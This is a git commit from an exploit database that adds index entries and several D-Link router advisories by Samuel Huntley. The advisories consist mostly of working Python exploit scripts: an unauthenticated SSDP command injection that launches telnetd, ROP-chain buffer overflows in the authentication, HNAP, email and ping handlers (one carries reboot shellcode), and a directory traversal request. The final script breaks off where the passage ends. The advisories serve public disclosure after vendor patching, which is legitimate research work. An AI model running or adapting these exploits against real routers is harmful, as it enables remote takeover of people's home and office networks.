DB: 2015-11-17

37 new exploits
This commit is contained in:
Offensive Security 2015-11-17 05:03:43 +00:00
parent 41bf68ffcd
commit ab27bce7a8
38 changed files with 3382 additions and 0 deletions

View file

@ -34969,3 +34969,40 @@ id,file,description,date,author,platform,type,port
38695,platforms/php/webapps/38695.txt,"CakePHP AssetDispatcher Class Local File Include Vulnerability",2013-08-13,"Takeshi Terada",php,webapps,0
38696,platforms/asp/webapps/38696.txt,"DotNetNuke 6.1.x Cross Site Scripting Vulnerability",2013-08-13,"Sajjad Pourali",asp,webapps,0
38697,platforms/php/webapps/38697.txt,"ACal 2.2.6 'view' Parameter Local File Include Vulnerability",2013-08-15,ICheer_No0M,php,webapps,0
38698,platforms/php/webapps/38698.html,"CF Image Host 1.65 - CSRF Vulnerability",2015-11-16,hyp3rlinx,php,webapps,0
38699,platforms/php/webapps/38699.txt,"CF Image Host 1.65 - PHP Command Injection",2015-11-16,hyp3rlinx,php,webapps,0
38700,platforms/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - .gen SEH Overwrite Buffer Overflow Exploit",2015-11-16,LiquidWorm,windows,local,0
38701,platforms/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - .gfb SEH Overwrite Buffer Overflow Vulnerability",2015-11-16,LiquidWorm,windows,dos,0
38702,platforms/windows/dos/38702.txt,"TECO TP3-PCLINK 2.1 - .tpc File Handling Buffer Overflow Vulnerability",2015-11-16,LiquidWorm,windows,dos,0
38703,platforms/windows/dos/38703.txt,"TECO AP-PCLINK 1.094 - .tpc File Handling Buffer Overflow Vulnerability",2015-11-16,LiquidWorm,windows,dos,0
38704,platforms/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - .lf5 SEH Overwrite Buffer Overflow Exploit",2015-11-16,LiquidWorm,windows,local,0
38705,platforms/windows/dos/38705.py,"Sam Spade 1.14 - Browse URL Buffer Overflow PoC",2015-11-16,"Nipun Jaswal",windows,dos,0
38706,platforms/multiple/webapps/38706.txt,"VLC Web Interface 2.2.1 - Metadata Title XSS Vulnerability",2015-11-16,"Andrea Sindoni",multiple,webapps,0
38707,platforms/hardware/webapps/38707.txt,"D-link Wireless Router DIR-816L CSRF Vulnerability",2015-11-16,"Bhadresh Patel",hardware,webapps,0
38708,platforms/lin_x86-64/shellcode/38708.asm,"x64 Linux egghunter in 24 bytes",2015-11-16,d4sh&r,lin_x86-64,shellcode,0
38709,platforms/php/webapps/38709.txt,"MCImageManager Multiple Security Vulnerabilities",2013-07-16,MustLive,php,webapps,0
38710,platforms/windows/dos/38710.py,"foobar2000 1.3.9 - (.pls; .m3u; .m3u8) Local Crash PoC",2015-11-16,"Antonio Z.",windows,dos,0
38711,platforms/windows/dos/38711.py,"foobar2000 1.3.9 - (.asx) Local Crash PoC",2015-11-16,"Antonio Z.",windows,dos,0
38712,platforms/php/webapps/38712.txt,"Bo-Blog 2.1.1 Cross Site Scripting and SQL Injection Vulnerabilities",2013-08-20,"Ashiyane Digital Security Team",php,webapps,0
38713,platforms/windows/dos/38713.txt,"Windows Kernel win32k.sys Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0
38714,platforms/windows/dos/38714.txt,"Windows Kernel win32k.sys Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0
38715,platforms/hardware/remote/38715.txt,"D-Link DIR-815_ DIR-850L - SSDP Command Injection",2015-11-16,"Samuel Huntley",hardware,remote,1900
38716,platforms/hardware/remote/38716.txt,"D-Link DIR-890L/R - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38717,platforms/hardware/remote/38717.txt,"D-Link DIR-866L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38718,platforms/hardware/remote/38718.txt,"D-Link DIR-825 (vC) - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38719,platforms/hardware/remote/38719.txt,"D-Link DIR-818W - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38720,platforms/hardware/remote/38720.txt,"D-Link DIR-817LW - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38721,platforms/hardware/remote/38721.txt,"D-Link DIR-815 - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38722,platforms/hardware/remote/38722.txt,"D-Link DIR-645 - Multiple UPNP Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38723,platforms/hardware/remote/38723.txt,"D-Link DIR-615 - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38724,platforms/hardware/remote/38724.txt,"D-Link DIR-601 - Command Injection Vulnerability",2015-11-16,"Samuel Huntley",hardware,remote,80
38725,platforms/hardware/remote/38725.txt,"D-Link DIR-880L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38726,platforms/hardware/remote/38726.txt,"D-Link DGL5500 - HNAP Buffer Overflow Vulnerability",2015-11-16,"Samuel Huntley",hardware,remote,80
38727,platforms/php/webapps/38727.txt,"AlegroCart 1.2.8 - Multiple SQL Injection Vulnerabilities",2015-11-16,"Curesec Research Team",php,webapps,80
38728,platforms/php/webapps/38728.txt,"AlegroCart 1.2.8 - LFI/RFI Vulnerability",2015-11-16,"Curesec Research Team",php,webapps,80
38729,platforms/php/webapps/38729.txt,"ClipperCMS 1.3.0 - Multiple SQL Injection Vulnerabilities",2015-11-16,"Curesec Research Team",php,webapps,80
38730,platforms/php/remote/38730.py,"ClipperCMS 1.3.0 - Code Execution Vulnerability",2015-11-16,"Curesec Research Team",php,remote,80
38731,platforms/php/remote/38731.py,"XCart 5.2.6 - Code Execution Vulnerability",2015-11-16,"Curesec Research Team",php,remote,80
38732,platforms/php/remote/38732.rb,"Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload",2015-11-16,metasploit,php,remote,9999
38733,platforms/php/remote/38733.rb,"Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload",2015-11-16,metasploit,php,remote,9999
38734,platforms/windows/dos/38734.txt,"Kaspersky Antivirus - Certificate Handling Path Traversal",2015-11-16,"Google Security Research",windows,dos,0

Can't render this file because it is too large.

View file

@ -0,0 +1,51 @@
## Advisory Information
Title: SSDP command injection using UDP for a lot of Dlink routers including DIR-815, DIR-850L
Vendors contacted: William Brown <william.brown@dlink.com> (Dlink)
Release mode: Released
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
Many Dlink routers affected. Tested on DIR-815.
## Vulnerabilities Summary
DIR-815,850L and most of Dlink routers are susceptible to this flaw. This allows to perform command injection using SSDP packets and on UDP. So no authentication required. Just the fact that the attacker needs to be on wireless LAN or be able to fake a request coming from internal wireless LAN using some other mechanism.
## Details
# Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# This vulnerability is pretty much in every router that has cgibin and uses SSDP code in that cgibin. This one worked on the device dir-815. Will work only in WLAN
buf = 'M-SEARCH * HTTP/1.1\r\nHOST:239.255.255.250:1900\r\nST:urn:schemas-upnp-org:service:WANIPConnection:1;telnetd -p 9094;ls\r\nMX:2\r\nMAN:"ssdp:discover"\r\n\r\n'
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("239.255.255.250", 1900))
s.send(buf)
s.close()
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* Jan 22, 2015: Vulnerability found by Samuel Huntley by William Brown.
* Feb 15, 2015: Vulnerability is patched by Dlink
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley

View file

@ -0,0 +1,81 @@
## Advisory Information
Title: DIR-890L/R Buffer overflows in authentication and HNAP functionalities.
Date published: July,17th, 2015
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-890L/R -- AC3200 Ultra Wi-Fi Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. But it works as the buffer overflow happens in a seperate process than web server which does not allow web server to crash and hence attacker wins.
## Details
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
buf = "GET /webfa_authentication.cgi?id="
buf+="A"*408
buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack
buf+="sh;#"+"CCCC"+"DDDD" #R0-R2
buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values
buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address
buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd
buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Currently the address of exit function in libraray used as $PC
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley

View file

@ -0,0 +1,109 @@
## Advisory Information
Title: DIR-866L Buffer overflows in HNAP and send email functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR866L -- AC1750 Wi-Fi Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issue in DIR866L firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilities in hnap and send email functionalities. An attacker needs to be on wireless LAN or management interface needs to be exposed on Internet to exploit HNAP vulnerability but it requires no authentication. The send email buffer overflow does require the attacker to be on wireless LAN or requires to trick administrator to exploit using XSRF.
## Details
HNAP buffer overflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Observe this in a emulator/debugger or real device/debugger
buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
buf+="FFFF"
buf+=struct.pack(">I",0x2abfc9f4) # s0 ROP 2 which loads S2 with sleep address
buf+="\x2A\xBF\xB9\xF4" #s1 useless
buf+=struct.pack(">I",0x2ac14c30) # s2 Sleep address
buf+="DDDD" #s3
buf+=struct.pack(">I",0x2ac0fb50) # s4 ROP 4 finally loads the stack pointer into PC
buf+=struct.pack(">I",0x2ac0cacc) # retn Loads s0 with ROP2 and ao with 2 for sleep
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGG" #This is the padding as SP is added with 32 bytes in ROP 1
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # This is the padding as SP is added with 36 bytes in ROP 2
buf+=struct.pack(">I",0x2abcebd0) # This is the ROP 3 which loads S4 with address of ROP 4 and then loads S2 with stack pointer address
buf+="GGGGGGGGGGGGGGGG"
buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x
buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n"
# Bad chars \x00 - \x20
# sleep address 2ac14c30
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
----------------------------------------------------------------------------------------------------------------------
# Send email buffer overflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Observe this in a emulator/debugger or real device/debugger
buf = "GET /send_log_email.cgi?test=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
buf+="1111" #s0 Loaded argument in S0 which is loaded in a0
buf+=struct.pack(">I",0x2ac14c30) #s4 Sleep address 0x2ac14c30
buf+="XXXX"
buf+="FFFF" # s3
buf+="XXXX"
buf+="BBBB" # s5
buf+="CCCC" # s6
buf+="DDDD" # s7
buf+="DDDD" # extra pad
buf+=struct.pack(">I",0x2ABE94B8) # Retn address 2ABE94B8 ROP1
buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" #
buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" #
buf+="XXXX" #
buf+="BBBBBBBBBBBBBBBB" #16 bytes before shellcode
buf+="CCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley

View file

@ -0,0 +1,228 @@
## Advisory Information
Title: DIR-825 (vC) Buffer overflows in authentication,HNAP and ping functionalities. Also a directory traversal
issue exists which can be exploited
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed
issues as per the email communication. The vendor had also released the information on their security advisory
pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly
accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing
this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-825 (vC) -- Wireless AC750 Dual Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 4 security issues in DIR-825 firmware which allows an attacker to exploit buffer overflows in
authentication, HNAP and Ping functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited
by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack
directly or using XSRF if not exposed. The ping functionality based buffer overflow and directory traversal would
require an attacker to be on network and use XSRF to exploit buffer overflow whereas would require some sort of
authentication as low privileged user atleast to exploit directory traversal.
## Details
Buffer overflow in auth
------------------------------------------------------------------------------------------------------------------
----
import socket
import struct
'''
287 + XXXX in query_string value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
buf = "GET /dws/api/Login?test="
buf+="B"*251
buf+="CCCC" #s0
buf+="FFFF" #s1
buf+="FFFF" #s2
buf+="FFFF" #s3
buf+="XXXX" #s4
buf+="HHHH" #s5
buf+="IIII" #s6
buf+="JJJJ" #s7
buf+="LLLL"
buf+="\x2a\xbc\x8c\xa0" # retn address
buf+="C"*24 #
buf+="sh;;"
buf+="K"*20
buf+="\x2a\xc0\xd2\xa0" #s1
buf+="\x2a\xc0\xd2\xa0" #s1
buf
+="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCC"
buf+="&password=A HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml
+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
------------------------------------------------------------------------------------------------------------------
----
Buffer overflow in HNAP
------------------------------------------------------------------------------------------------------------------
----
import socket
import struct
'''
4138 + XXXX in SoapAction value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
buf = "POST /HNAP1/ HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="SOAPACTION:http://purenetworks.com/HNAP1/GetDeviceSettings/"+"A"*4138+"\x2a\xbc\x8c\xa0"+"D"*834+"\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: uid:1111;\r\n"
buf+="Content-Length: 13\r\n\r\ntest=test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
------------------------------------------------------------------------------------------------------------------
----
Directory traversal
------------------------------------------------------------------------------------------------------------------
----
import socket
import struct
'''
Useful to do directory traversal attack which is possible in html_response_page variable below which prints the
conf file, but theoretically any file, most likely only after login accessible
'''
payload="html_response_page=../etc/host.conf&action=do_graph_auth&login_name=test&login_pass=test1&login_n=test2&l
og_pass=test3&graph_code=63778&session_id=test5&test=test"
buf = "POST /apply.cgi HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: session_id=test5;\r\n"
buf+="Content-Length: "+str(len(payload))+"\r\n\r\n"
buf+=payload+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
------------------------------------------------------------------------------------------------------------------
----
Buffer overflow in ping
------------------------------------------------------------------------------------------------------------------
----
import socket
import struct
'''
282 + XXXX in ping_ipaddr value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
payload="html_response_page=tools_vct.asp&action=ping_test&html_response_return_page=tools_vct.asp&ping=ping&ping_
ipaddr=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"+"\x2a\xbc\x8c\xa0"+"CCXXXXDDDDEEEE&test=test"
buf = "POST /ping_response.cgi HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: session_id=test5;\r\n"
buf+="Content-Length: "+str(len(payload))+"\r\n\r\n"
buf+=payload+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
------------------------------------------------------------------------------------------------------------------
----
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley

View file

@ -0,0 +1,111 @@
## Advisory Information
Title: DIR-818W Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-818W -- Wireless AC750 Dual Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 3 security issues in DIR-818W firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.
## Details
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Reboot shellcode in there
'''
2096 after id GET param, you can control the RA
'''
buf = "GET /dws/api/Login?id="
buf+="A"*2064+"AAAA" #S0 # uclibc system address
buf+="\x2A\xAF\xD0\x84" #S1 -- ROP2 (Pulls Sleep address from S2 which is also stored there before, loads SP+36 is filled in RA with ROP3 and calls Sleep)
buf+="\x2A\xB1\x4D\xF0" #S2 -- points to Sleep in library
buf+="\x2A\xB1\x4D\xF0" #JUNK S3
buf+="\x2A\xB1\x4D\xF0" #JUNK S4
buf+="\x2A\xB1\x4D\xF0" #JUNK S5
buf+="\x2A\xB0\xDE\x54" # S6 filled up with pointer to ROP4 which is ultimate mission
buf+="\x2A\xB1\x4D\xF0" #JUNK S7
buf+="\x2A\xAC\xAD\x70" # RETN address -- ROP1 (fills a0 with 3 for sleep and s1 is filled before with ROP2 address which is called)
buf+="C"*36 #
buf+="\x2A\xAC\xD5\xB4" # ROP3 (Fills in S4 the address of SP+16 and then jumps to ROP4 which calls SP+16 stored in S4)
buf+="E"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #Reboot shellcode Big endian
buf+="Y"*120
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nContent-Length:5000\r\n\r\nid="+"A"*5000+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
'''
548 characters after SOapaction:http://purenetworks.com/HNAP1/GetDeviceSettings/ should work, although sprintf copies twice so only 242 characters are required including /var/run and /etc/templates/hnap which is concatenated with your string to create 548 characters
'''
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"B"*158
buf+="\x2A\xAF\xD0\x84" #S1 -- ROP2 (Pulls Sleep address from S2 which is also stored there before, loads SP+36 is filled in RA with ROP3 and calls Sleep)
buf+="\x2A\xB1\x4D\xF0" #S2 -- points to Sleep in library
buf+="AAAA"+"AAAA"+"AAAA" #s3,s4,s5 JUNK
buf+="\x2A\xB0\xDE\x54" # S6 filled up with pointer to ROP4 which is ultimate mission
buf+="AAAA" #s7 JUNK
buf+="\x2A\xAC\xAD\x70" # RETN address -- ROP1 (fills a0 with 3 for sleep and s1 is filled before with ROP2 address which is called)
